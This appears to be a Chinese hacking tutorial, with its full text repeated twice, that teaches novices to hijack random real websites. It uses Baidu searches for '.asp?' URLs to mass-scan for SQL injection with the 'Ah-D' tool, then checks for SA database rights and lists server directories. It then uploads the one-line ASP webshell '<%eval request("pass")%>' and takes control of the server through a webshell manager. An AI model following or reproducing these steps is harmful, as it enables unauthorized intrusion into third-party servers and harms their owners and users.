论文部分内容阅读
许多朋友老是问怎么才能入侵一个网站,也有的朋友问有没有上传木马的空间,或者问怎么拿到一只肉鸡玩。其实抓肉鸡是一个很简单的事情。这里我们就再现经典的SQL注入漏洞,包每一个读者都能拿到网站肉鸡。
搜漏的技巧——寻找有漏澜的主机
首先准备的是一个SQL注入工具“啊D注入工具V2.3”。这可是一个经典的SQL注入工具了。不知道什么是SQL注入的朋友,可以上网查一下资料。既然拿出“啊D注入工具v2.3”,那么肯定是要进行SQL注入攻击了,但问题是如何寻找有SQL注入漏洞的主机呢?一个非常简单的技巧那就是百度与啊D结合,迅速寻找到上万台有SQL注入漏洞的网站主机。
百度找链接
打开百度搜索。在页面中点击“高级”链接,打开百度的高级搜索页面。在“包含以下全部的关键词”中输入“.asp?”,将“搜索结果显示条数”设置为“每页显示100条”,“语言”设置为“全部语言”。将“关键词位置”设置为“仅在网页的URL中”,最后点击“百度一下”按钮,即可打开搜索结果面面了。可以看到页面中显示的搜索结果,都是形如“http://www.***.com/*.asp?*=**之类的字符或数字型链接地址。对SQL注入略有所知的用户。肯定都会忍不住打开一个链接,然后开始测试链接是否存在SQL注入漏洞了吧?
一个秘不外传的技巧
一般的黑客书籍上面,都是教菜鸟们一个一个地检测链接地址。不管是手工检测也好,还是用工具检测也好,都是非常麻烦的。也许试到头昏眼花,也不一定找得到SQL注入漏洞链接地址。其实有更高效的方法可以让寻找SQL注入漏洞自动化许多。
直接在浏览器地址栏中。复制搜索结果网页的链接地址,这里为“http://www.baidu.com/s?tn=baiduadv&q1=.asp%3F&q2=&q3=&q4=&rn=100&lm=0&ct=O&ft=&q5=2&q6=”。复制后,运行“啊D注入工具v2.3”,点击左侧边栏中的“注入检测”一“扫描注入点”,在右边窗口的地址栏中。粘贴刚才复制的搜索链接。然后点击地址栏后的“打开网页”按钮,在窗口中就会显示刚才的搜索结果页面了。
此时,表面看起来与在浏览器中进行搜索没有什么两样,但实际上啊D注入工具已经开始自动分析搜索结果中的每一个链接地址。并检测是否存在SQL注入漏洞了。在下方的检测框中会显示“正在检测xx个链接”,多等一会儿,让所有链接检测完毕。然后就可以看到检测框中列表显示存在SQL注入漏洞的链接地址了。如果在当前页中没有检测到多少漏洞链接,那么可在上方的窗口页面中,点击搜索结果下一页链接,继续检测漏洞链接。最多一分钟,你就可以看到列表中显示数十个漏洞链接地址了。
由于SQL注入攻击曾经很泛滥。因此许多网站都打上了SQL注入漏洞的补丁。现在要找存在SQL注入漏洞的站点是非常难了。不过巧妙的将百度搜索功能与啊D注入工具的页面链接分析检测功能相结合,就可以很轻松的找到成千上万个SQL注入漏洞链接地址了。上面的搜索结果就有4800多万条,这其中就算只有1%的漏洞概率。也有数十万个漏洞链接地址!菜鸟们再也不用担心出现漏洞过时,找不到漏洞站点攻击练手的现象了。
上面我们使用的是关键词“.asp?”进行搜索,还可以使用其它的关键词进行搜索,例如“www.asp?”、“edu.asp?”、“电影.asp?”、“aspx?”、“.js7”等。可以扩大搜索结果。~Google之类的国外搜索引擎进行搜索,则可以找到更多的漏洞站点。
轻松拿下漏洞站点
找到了存在SQL注入漏洞的站点后,如何进行攻击呢?SQL注入攻击的方式多种多样。比如猜解管理员密码和后台登录页面,直接利用xp_cmdshell开3389或上传木马等。这里我们选择的当然是最简单的方法,什么权限、后台密码破解之类的都不用——利用SA上传木马
检测SA权限
在检测到的漏洞链接地址列表中,右键点击某个漏洞链接,在弹出菜单中选择“注入检测”命令,切换到“SQL注入检测”界面。点击右边界面中的“检测”按钮。将自动检测该链接是否存在SQL注入漏洞。如果存在的话,则显示当前数据库类型、用户和权限等信息。详细看看下方显示的结果。如果看到“SA”和“多句执行”,那么恭喜小菜们,你基本上可以肯定的拿下这个网站。获得一个肉鸡了!
如果检测的链接不具有SA权限,那么可以换一个链接地址,反正扫描到的漏洞链接是一大把,总有许多是具备sA权限的。
列目录。找网站路径
点击左侧“相关工具”——“目录查看”,在目录查看界面的“检测位置”中,输入要查看文件的目录路径,点击“开始检测”按钮。即可显示该目录下的文件及子文件夹了。一般来说,网站的路径都是位于非系统盘的,大部分是位于“D:/WEB”中,可以直接查看该路径中的文件信息。如果该文件夹不存在,则只有从C盘D盘等根目录慢慢查找网站的路径了。
上传木马
用记事本编写一个后缀名,asp的文件。内容如下:
<%eval request(“pass”)%>
注意。在写入文件时,上面代码中的“pass”就是后面要用到的连接密码。需要改为自己想要的密码。将文件保存为“muma.asp”。然后在啊D注入工具中,点击左侧“相关工具”——“CMD,上传”项。在命令执行与上传界面下方的“上传文件”中,点击下方的“本地文件”浏览按钮,浏览指定刚才保存的“muma.asp”文件。在“目标路径”中设定文件保存路径,注意要指定保存在网站路径之下。这里为“D:/WEB/muma.asp”。最后点击“上传”按钮,就可以成功的将木马上传到网站根目录下了。上传完成后。再用“目录查看”功能,查看一下文件是否上传成功。
连接木马
运行桂林老兵的木马后门管理工具“WebshelIControl v2.0”。点击菜单“工具”——“shell管理”命令,打开Shell管理窗口。在下方的“地址”中输入刚才上传的ASP木马链接地址及连接密码,点击“连接”按钮。即可连接打开Webshell。在Webshe LI管理窗口中,可以查看任意目录中的文件,并可以上传、下载或编辑任意文件。
现在这台网站服务器基本处于我们的控制之下了,要上传木马,或者将网站作为自己的免费空间都是很容易的了。至于进一步提升权限。安装远程控制木马则需要一定的入侵知识。留待小菜们以后慢慢提高学习吧。
搜漏的技巧——寻找有漏澜的主机
首先准备的是一个SQL注入工具“啊D注入工具V2.3”。这可是一个经典的SQL注入工具了。不知道什么是SQL注入的朋友,可以上网查一下资料。既然拿出“啊D注入工具v2.3”,那么肯定是要进行SQL注入攻击了,但问题是如何寻找有SQL注入漏洞的主机呢?一个非常简单的技巧那就是百度与啊D结合,迅速寻找到上万台有SQL注入漏洞的网站主机。
百度找链接
打开百度搜索。在页面中点击“高级”链接,打开百度的高级搜索页面。在“包含以下全部的关键词”中输入“.asp?”,将“搜索结果显示条数”设置为“每页显示100条”,“语言”设置为“全部语言”。将“关键词位置”设置为“仅在网页的URL中”,最后点击“百度一下”按钮,即可打开搜索结果面面了。可以看到页面中显示的搜索结果,都是形如“http://www.***.com/*.asp?*=**之类的字符或数字型链接地址。对SQL注入略有所知的用户。肯定都会忍不住打开一个链接,然后开始测试链接是否存在SQL注入漏洞了吧?
一个秘不外传的技巧
一般的黑客书籍上面,都是教菜鸟们一个一个地检测链接地址。不管是手工检测也好,还是用工具检测也好,都是非常麻烦的。也许试到头昏眼花,也不一定找得到SQL注入漏洞链接地址。其实有更高效的方法可以让寻找SQL注入漏洞自动化许多。
直接在浏览器地址栏中。复制搜索结果网页的链接地址,这里为“http://www.baidu.com/s?tn=baiduadv&q1=.asp%3F&q2=&q3=&q4=&rn=100&lm=0&ct=O&ft=&q5=2&q6=”。复制后,运行“啊D注入工具v2.3”,点击左侧边栏中的“注入检测”一“扫描注入点”,在右边窗口的地址栏中。粘贴刚才复制的搜索链接。然后点击地址栏后的“打开网页”按钮,在窗口中就会显示刚才的搜索结果页面了。
此时,表面看起来与在浏览器中进行搜索没有什么两样,但实际上啊D注入工具已经开始自动分析搜索结果中的每一个链接地址。并检测是否存在SQL注入漏洞了。在下方的检测框中会显示“正在检测xx个链接”,多等一会儿,让所有链接检测完毕。然后就可以看到检测框中列表显示存在SQL注入漏洞的链接地址了。如果在当前页中没有检测到多少漏洞链接,那么可在上方的窗口页面中,点击搜索结果下一页链接,继续检测漏洞链接。最多一分钟,你就可以看到列表中显示数十个漏洞链接地址了。
由于SQL注入攻击曾经很泛滥。因此许多网站都打上了SQL注入漏洞的补丁。现在要找存在SQL注入漏洞的站点是非常难了。不过巧妙的将百度搜索功能与啊D注入工具的页面链接分析检测功能相结合,就可以很轻松的找到成千上万个SQL注入漏洞链接地址了。上面的搜索结果就有4800多万条,这其中就算只有1%的漏洞概率。也有数十万个漏洞链接地址!菜鸟们再也不用担心出现漏洞过时,找不到漏洞站点攻击练手的现象了。
上面我们使用的是关键词“.asp?”进行搜索,还可以使用其它的关键词进行搜索,例如“www.asp?”、“edu.asp?”、“电影.asp?”、“aspx?”、“.js7”等。可以扩大搜索结果。~Google之类的国外搜索引擎进行搜索,则可以找到更多的漏洞站点。
轻松拿下漏洞站点
找到了存在SQL注入漏洞的站点后,如何进行攻击呢?SQL注入攻击的方式多种多样。比如猜解管理员密码和后台登录页面,直接利用xp_cmdshell开3389或上传木马等。这里我们选择的当然是最简单的方法,什么权限、后台密码破解之类的都不用——利用SA上传木马
检测SA权限
在检测到的漏洞链接地址列表中,右键点击某个漏洞链接,在弹出菜单中选择“注入检测”命令,切换到“SQL注入检测”界面。点击右边界面中的“检测”按钮。将自动检测该链接是否存在SQL注入漏洞。如果存在的话,则显示当前数据库类型、用户和权限等信息。详细看看下方显示的结果。如果看到“SA”和“多句执行”,那么恭喜小菜们,你基本上可以肯定的拿下这个网站。获得一个肉鸡了!
如果检测的链接不具有SA权限,那么可以换一个链接地址,反正扫描到的漏洞链接是一大把,总有许多是具备sA权限的。
列目录。找网站路径
点击左侧“相关工具”——“目录查看”,在目录查看界面的“检测位置”中,输入要查看文件的目录路径,点击“开始检测”按钮。即可显示该目录下的文件及子文件夹了。一般来说,网站的路径都是位于非系统盘的,大部分是位于“D:/WEB”中,可以直接查看该路径中的文件信息。如果该文件夹不存在,则只有从C盘D盘等根目录慢慢查找网站的路径了。
上传木马
用记事本编写一个后缀名,asp的文件。内容如下:
<%eval request(“pass”)%>
注意。在写入文件时,上面代码中的“pass”就是后面要用到的连接密码。需要改为自己想要的密码。将文件保存为“muma.asp”。然后在啊D注入工具中,点击左侧“相关工具”——“CMD,上传”项。在命令执行与上传界面下方的“上传文件”中,点击下方的“本地文件”浏览按钮,浏览指定刚才保存的“muma.asp”文件。在“目标路径”中设定文件保存路径,注意要指定保存在网站路径之下。这里为“D:/WEB/muma.asp”。最后点击“上传”按钮,就可以成功的将木马上传到网站根目录下了。上传完成后。再用“目录查看”功能,查看一下文件是否上传成功。
连接木马
运行桂林老兵的木马后门管理工具“WebshelIControl v2.0”。点击菜单“工具”——“shell管理”命令,打开Shell管理窗口。在下方的“地址”中输入刚才上传的ASP木马链接地址及连接密码,点击“连接”按钮。即可连接打开Webshell。在Webshe LI管理窗口中,可以查看任意目录中的文件,并可以上传、下载或编辑任意文件。
现在这台网站服务器基本处于我们的控制之下了,要上传木马,或者将网站作为自己的免费空间都是很容易的了。至于进一步提升权限。安装远程控制木马则需要一定的入侵知识。留待小菜们以后慢慢提高学习吧。